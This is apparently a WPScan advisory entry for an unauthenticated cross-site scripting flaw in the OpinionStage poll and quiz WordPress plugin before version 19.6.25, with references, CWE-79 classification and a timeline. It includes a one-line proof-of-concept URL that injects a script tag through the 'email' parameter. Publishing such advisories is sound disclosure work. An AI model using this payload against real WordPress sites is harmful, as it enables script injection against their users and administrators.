Poll, Survey, Form & Quiz Maker by OpinionStage < 19.6.25 - Unauthenticated Cross-Site Scripting (XSS)



Description
This vulnerability has been seen actively exploited in the wild.
Proof of Concept
http://www.example.com/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email="><script>alert(1)</script>

Affects Plugin

References

URL https://www.pluginvulnerabilities.com/2019/09/16/hackers-may-already-be-targeting-this-persistent-xss-vulnerability-in-poll-survey-form-quiz-maker-by-opinionstage/
URL https://plugins.trac.wordpress.org/changeset/2158590/social-polls-by-opinionstage

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 917
Verified No
WPVDB ID 10080

Timeline

Publicly Published 2019-09-16 (10 months ago)
Added 2020-02-20 (5 months ago)
Last Updated 2020-02-21 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin